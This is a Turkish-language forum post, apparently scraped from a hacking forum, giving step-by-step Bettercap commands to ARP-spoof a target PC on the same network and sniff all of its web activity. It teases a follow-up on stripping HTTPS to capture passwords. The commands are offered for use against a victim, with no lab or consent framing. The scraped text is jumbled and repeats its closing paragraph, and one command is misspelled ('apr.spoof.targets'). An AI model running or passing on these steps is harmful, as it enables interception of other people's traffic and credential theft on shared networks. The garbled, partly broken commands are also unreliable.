Ma name is enough
Süper Üye
Bildiğimiz üzere arpspoof işlemleri için önde gelen (man in the middle) programların başında hali hazırda güncellenmeyen "MITMF" var. Fakat bunun yanında güncel olan ve kullanımı daha basit bir arayüzden bahsetmek istiyorum..
Linux üzerinde kurulum yapmadan önce
Bu yükleme işlemi bittikten sonra Bettercap kurulumuna geçebiliriz.
Kurulum yapıldıktan sonra giriş yapmak için
NAT Network kullanıcıları için bu eth<sayı> şeklinde işleme alınır. Wireless Card kullananlarda ise wlan<sayı> olarak yazılır.
// Programımız açıldıktan sonra şu komutları çalıştırabilir ve hedef pcye (Eğer aynı ağda isek) bağlanabiliriz.
Yazarak aktif ediyoruz. (Netdiscover işlemleri için açıyoruz bunu). Hedef pc üzerindeki tüm IP adreslerini probe yaparak yani dürterek recon çalıştırıyor ve düzenli hale getirerek bize iletilmesini sağlıyor.
arp attack işlemlerimizi yapabilmek için çalıştırıyoruz. Bununla beraber 2 farklı parametre çalıştıracağız.
Yazarak arp spoof işlemlerimizi de aktif etmiş oluyoruz.
// Akabinde son olarak sinff işlemlerinin yani hedef pc üzerinde yapılan tüm internet aramalarını log halinde alabilmek için bir komut daha kullanacağız.
Daha sonra hedef pc üzerinde yapılan internet işlemleri ve tüm aktiviteleri listeler halinde görebilirsiniz, bir sonraki konuda HTTPS adreslerini HTTP'ye çevirerek nasıl şifreleri alacağımızı göstereceğim. Anlatım şekli hoşunuza gitmediyse ya da daha ayrıntılı anlatımlar isterseniz iletebilirsiniz. Buna göre anlatımlarda farklılık ve değişkenlikler yapabiliriz. Hepinize iyi forumlar diliyorum.
Linux üzerinde kurulum yapmadan önce
Bash:
apt-get update
Bash:
apt-get install bettercap
Bash:
bettercap -iface <bağlı bulunduğunuz interface>// Programımız açıldıktan sonra şu komutları çalıştırabilir ve hedef pcye (Eğer aynı ağda isek) bağlanabiliriz.
Bash:
arp.probe on
Bash:
arp.spoof on
Bash:
set arp.spoof.fullduplex true
Bash:
set apr.spoof.targets <hedef ip adresi>// Akabinde son olarak sinff işlemlerinin yani hedef pc üzerinde yapılan tüm internet aramalarını log halinde alabilmek için bir komut daha kullanacağız.
Bash:
net.sniff onDaha sonra hedef pc üzerinde yapılan internet işlemleri ve tüm aktiviteleri listeler halinde görebilirsiniz, bir sonraki konuda HTTPS adreslerini HTTP'ye çevirerek nasıl şifreleri alacağımızı göstereceğim. Anlatım şekli hoşunuza gitmediyse ya da daha ayrıntılı anlatımlar isterseniz iletebilirsiniz. Buna göre anlatımlarda farklılık ve değişkenlikler yapabiliriz. Hepinize iyi forumlar diliyorum.
Fakat yüzeysel anlatım sağlayacağım, detaylı anlatım epey zamanımı alır. En azından nasıl kullanılacağı ve hangi tür işlemler yaparak kurulum aşamasında kolaylık sağlanacağını dile getirsek kullanıcılar için tatlı olabilir diye düşünüyorum.
